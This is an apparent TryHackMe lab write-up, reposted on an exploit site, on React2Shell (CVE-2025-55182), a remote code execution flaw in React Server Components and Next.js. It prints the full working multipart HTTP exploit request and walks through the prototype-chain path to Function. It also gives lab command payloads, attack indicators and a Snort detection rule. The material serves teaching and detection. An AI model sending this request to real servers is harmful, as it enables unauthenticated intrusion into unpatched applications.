Share
## https://sploitus.com/exploit?id=0C5E1166-65F6-5683-BF77-88496F4CF365
# ๐ŸŽฏ React2Shell (CVE-2025-55182) โ€” From React Server Components to Full RCE

**Lab:** [https://tryhackme.com/room/react2shellcve202555182](https://tryhackme.com/room/react2shellcve202555182) 
**Difficulty:** Intermediate โ†’ Advanced 
**Category:** Web Exploitation | Deserialization | RCE 

![Cover](R2S/Cover.jpeg)

---

## ๐Ÿงฉ Task 1: Introduction โ€” Why React2Shell Is a Big Deal

CVE-2025-55182, nicknamed **React2Shell**, is one of those vulnerabilities that instantly makes defenders nervous ๐Ÿ˜ฌ. Discovered in **December 2025**, it carries a **CVSS score of 10.0**, which already tells you this isnโ€™t some edge-case bug.

At its core, this vulnerability affects **React Server Components (RSC)** and frameworks built on top of them โ€” most notably **Next.js**. The scary part?

๐Ÿ‘‰ **Unauthenticated Remote Code Execution (RCE)**
๐Ÿ‘‰ **Single crafted HTTP request**
๐Ÿ‘‰ **Default configurations are vulnerable**

No login. No special permissions. Just one well-formed request.

### ๐Ÿ”ฅ Affected React packages

* `react-server-dom-webpack`
* `react-server-dom-parcel`
* `react-server-dom-turbopack`

### โœ… Fixed versions

* **19.0.1**
* **19.1.2**
* **19.2.1**

This room walks us through *why* this bug exists, *how* it is exploited, and *what* defenders can do about it.

**Flag:** No answer needed.

---

## ๐Ÿง  Task 2: React Server Components & the Flight Protocol

Before exploitation, we need architecture clarity.

### What are React Server Components?

React Server Components (introduced in **React 19**) allow parts of a React app to run **on the server**, not the browser. This means:

* Heavy computation stays server-side โš™๏ธ
* Client receives only rendered output ๐Ÿ“ฆ
* Better performance, smaller bundles

### Enter: React Flight โœˆ๏ธ

Communication between client and server happens via the **React Flight protocol**. This protocol serializes data on the client and deserializes it on the server.

It uses **special markers**:

* `$@` โ†’ Chunk reference
* `$B` โ†’ **Blob reference**
* Property paths via colon notation
  Example:

  ```
  $1:constructor:constructor
  ```

โš ๏ธ And this serialization logic is exactly where things go wrong.

**Question:** What symbol denotes a Blob reference?
โœ… **Answer:** `$B`

---

## ๐Ÿ’ฃ Task 3: The Core Vulnerability โ€” Unsafe Deserialization

At the heart of CVE-2025-55182 lies a **classic unsafe deserialization flaw**.

Letโ€™s look at the vulnerable pattern (do not crop ๐Ÿ‘‡):

```js
function requireModule(metadata) {  
 var moduleExports = __webpack_require__(metadata[0]);  
 // ... additional logic ...  
 return moduleExports[metadata[2]];  // VULNERABLE LINE  
}  
```

### Why is this dangerous?

In JavaScript, bracket notation:

```js
obj[someKey]
```

does **not** limit access to exported properties only. It walks the **entire prototype chain**.

Now comes the critical insight ๐Ÿ‘€:

* Every JavaScript function has a `.constructor`
* `constructor` points to the **Function constructor**
* `Function("code")` = arbitrary JS execution

### Weaponizing Flight references

Because the Flight protocol allows colon-separated paths, an attacker can send:

```
$1:constructor:constructor
```

Which resolves to:

1. Get module chunk
2. Access `.constructor`
3. Access `.constructor` again โ†’ **Function**

At this point, game over ๐ŸŽฎ.

**Flag:** No answer needed.

---

## ๐Ÿงจ Task 4: Exploitation Chain โ€” From Bug to RCE

Now letโ€™s break down **maple3142โ€™s PoC**, step by step.

### ๐Ÿงฉ Stage 1: Fake Chunk Object

The attacker sends a multipart request containing a **fake Chunk object**:

```json
{  
 "then": "$1:__proto__:then",  
 "status": "resolved_model",  
 "reason": -1,  
 "value": "{\\"then\\":\\"$B1337\\"}",  
 "_response": {  
   "_prefix": "process.mainModule.require('child_process').execSync('xcalc');",  
   "_chunks": "$Q2",  
   "_formData": {  
     "get": "$1:constructor:constructor"  
   }  
 }  
}
```

This object **mimics Reactโ€™s internal Chunk structure**.
By pointing `then` to `Chunk.prototype.then`, React is tricked into **awaiting attacker-controlled logic**.

---

### ๐Ÿงฉ Stage 2: Blob Handler Abuse

The `$B1337` marker triggers the **Blob deserialization handler**, which internally executes:

```js
response._formData.get(response._prefix + id)
```

But we poisoned:

* `_formData.get` โ†’ `Function`
* `_prefix` โ†’ malicious JS

Resulting execution:

```js
Function("process.mainModule.require('child_process').execSync('xcalc');1337")
```

๐Ÿ’ฅ Arbitrary JavaScript execution achieved.

---

### ๐Ÿงฉ Stage 3: OS Command Execution

The PoC executes:

```js
process.mainModule
  .require('child_process')
  .execSync('xcalc')
```

This can be trivially replaced with:

* Reverse shells
* Secret exfiltration
* File reads
* Cloud credential theft โ˜ ๏ธ

**Flag:** No answer needed.

---

## ๐Ÿ“ฆ Task 5: Full HTTP PoC Breakdown

Hereโ€™s the **complete exploit request** (verbatim, not cropped):

```
POST / HTTP/1.1  
Host: localhost  
Next-Action: x  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad

------WebKitFormBoundaryx8jO2oVc6SWP3Sad  
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}  
------WebKitFormBoundaryx8jO2oVc6SWP3Sad  
Content-Disposition: form-data; name="1"

"$@0"  
------WebKitFormBoundaryx8jO2oVc6SWP3Sad  
Content-Disposition: form-data; name="2"

[]  
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--  

```

(โ€ฆmultipart body continuesโ€ฆ)

### Key things to notice ๐Ÿ‘‡

* `Next-Action` header triggers Server Actions
* `multipart/form-data` is mandatory
* `$@0` creates a self-reference
* `$B1337` triggers Blob logic
* `constructor:constructor` leads to `Function`

This is not accidental โ€” itโ€™s a **precisely engineered chain**.

---

### ๐ŸŒ Affected Ecosystem

* **React:** 19.0.0, 19.1.0, 19.1.1, 19.2.0
* **Next.js:**

  * โ‰ฅ14.3.0-canary.77
  * All 15.x
  * Early 16.x
* **Others:** React Router (RSC), Waku, Redwood SDK

๐Ÿ“Š Wiz research: **39% of cloud environments** exposed
๐ŸŒ Shodan: **571k+ React servers**, **444k+ Next.js**

Thatโ€™sโ€ฆ a lot ๐Ÿ˜ถ

---

## ๐Ÿงช Task 6: Exploitation in the Lab

First in Repeater, make New HTTP Request and select Target.

![1](R2S/1.png)

Using **Burp Suite Repeater**, we send the payload:

```js
execSync('id')
```

![2](R2S/2.png)

And later:

```js
execSync('whoami')
```

![3](R2S/3.png)

### โœ… Results

* **User:** `ubuntu`
* **Flag:**

  ```
  THM{React-19.2.0}
  ```

Clean, reliable, repeatable exploitation ๐Ÿ’€

---

## ๐Ÿ›ก๏ธ Task 7: Detection & Defense

Good news for defenders ๐Ÿ‘ฎโ€โ™‚๏ธ โ€” exploitation leaves fingerprints.

### ๐Ÿ”Ž Indicators of Attack

* `Next-Action` header
* `multipart/form-data`
* `"status":"resolved_model"`
* `"then":"$1:__proto__:then"`

These **should never appear** in normal user traffic.

---

### ๐Ÿšจ Snort Rule (v3)

```snort
alert http any any -> $LAN_NETWORK any (
    msg:"Potential Next.js React2Shell / CVE-2025-66478 attempt";
    flow:to_server,established;
    content:"Next-Action"; http_header; nocase;
    content:"multipart/form-data"; http_header; nocase;
    pcre:"/Content-Disposition:\s*form-data;\s*name=\"0\"/s";
    pcre:"/\"status\"\s*:\s*\"resolved_model\"/s";
    pcre:"/\"then\"\s*:\s*\"\$1:__proto__:then\"/s";
    classtype:web-application-attack;
    sid:6655001;
    rev:1;
)
```

---

### ๐Ÿงพ OSQuery โ€” Finding Vulnerable Packages

```json
{
  "queries": {
    "detect_rev2shell_react_server_components": {
      "query": "SELECT name, version, path FROM npm_packages WHERE ...",
      "interval": 3600
    }
  }
}
```

Perfect for:

* CI/CD pipelines
* Endpoint audits
* Pre-production checks

![4](R2S/4.png)

---

## ๐Ÿง  Final Thoughts

React2Shell is a **textbook example** of:

* Why unsafe deserialization is deadly
* How prototype chains can betray you
* Why โ€œdefault configsโ€ are dangerous

Once patched versions are installed and `npm audit` recommendations followed, **the exploit dies completely** โœ….

โš ๏ธ Never test this outside authorized labs.
๐Ÿ”ฅ Always patch fast.
๐Ÿง  Always understand *why* a bug exists โ€” not just how to exploit it.

---

### โญ Follow Me & Connect

If you enjoyed this write-up or want to stay connected with my work in cybersecurity, CTFs, and VAPT:

๐Ÿ”— **GitHub:** [https://github.com/AdityaBhatt3010](https://github.com/AdityaBhatt3010) 
๐Ÿ’ผ **LinkedIn:** [https://www.linkedin.com/in/adityabhatt3010/](https://www.linkedin.com/in/adityabhatt3010/) 
โœ๏ธ **Medium:** [https://medium.com/@adityabhatt3010](https://medium.com/@adityabhatt3010) 

Happy hacking โ€” responsibly ๐Ÿ—ฟ๐Ÿš€

---